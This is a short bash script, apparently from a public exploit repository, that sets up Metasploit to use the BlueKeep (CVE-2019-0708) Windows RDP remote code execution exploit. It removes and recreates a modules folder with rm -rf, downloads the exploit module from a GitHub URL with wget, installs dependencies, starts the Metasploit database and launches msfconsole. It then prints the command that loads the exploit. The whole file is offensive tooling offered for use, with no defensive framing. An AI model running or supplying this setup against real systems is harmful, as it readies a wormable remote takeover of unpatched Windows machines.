#!/usr/bin/bash
# Author @nu11secur1ty
# WARNING: Do not edit this file!
cd /usr/share/metasploit-framework/modules/exploits/windows
    rm -rf rdp
    mkdir rdp && cd rdp
            wget https://raw.githubusercontent.com/nu11secur1ty/Kali-Linux/master/BlueKeep/cve_2019_0708_bluekeep_rce/cve_2019_0708_bluekeep_rce.rb
            cd /usr/share/metasploit-framework/
                gem install bundler && bundle
                cd 
        msfdb init
        echo -e "\e[32mCopy and paste this command into your Metasploit session: (use exploit/windows/rdp/cve_2019_0708_bluekeep_rce)"
        msfconsole -q
